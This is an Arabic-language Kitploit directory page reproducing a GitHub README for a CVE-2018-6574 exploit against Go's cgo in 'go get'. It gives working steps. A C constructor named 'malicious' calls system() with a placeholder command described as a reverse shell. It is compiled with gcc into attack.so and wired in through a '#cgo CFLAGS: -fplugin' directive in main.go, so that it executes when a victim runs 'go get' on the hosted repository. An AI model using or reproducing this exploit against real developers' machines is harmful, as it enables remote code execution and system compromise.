Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-6574 — استغلال Golang cgo لـ CVE-2018-6574 | Kitploit
أدوات/GitHubGitHub/paulogmota/cve-2018-6574
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHubpaulogmota/cve-2018-6574

CVE-2018-6574

استغلال Golang cgo لـ CVE-2018-6574

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-6574

خطوات إعادة الإنتاج:

  1. أنشئ ملف .c يحتوي على الأمر الضار (صدفة عكسية):
root@kitploit:~
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
  system("<insert your command here>");
}
  1. قم بتجميعه باستخدام GCC. يجب أن تجمّعه على نفس البنية ونظام التشغيل تمامًا كما في الهدف (مثل Linux x86_64):
root@kitploit:~
gcc -shared -o attack.so -fPIC attack.c
  1. أنشئ ملف main.go يحتوي على الترويسات التي ستُخبر Go باستخدام الإضافة الضارة الخاصة بنا:
root@kitploit:~
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
//   return f();
// }
//
// int fortytwo(){
//   return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
  1. استضف الملفين main.go و attack.so في مستودع على github
  2. على الجهاز الهدف، نفّذ الأمر `go get github.com//
  3. كن سعيدًا
تنزيل الأداة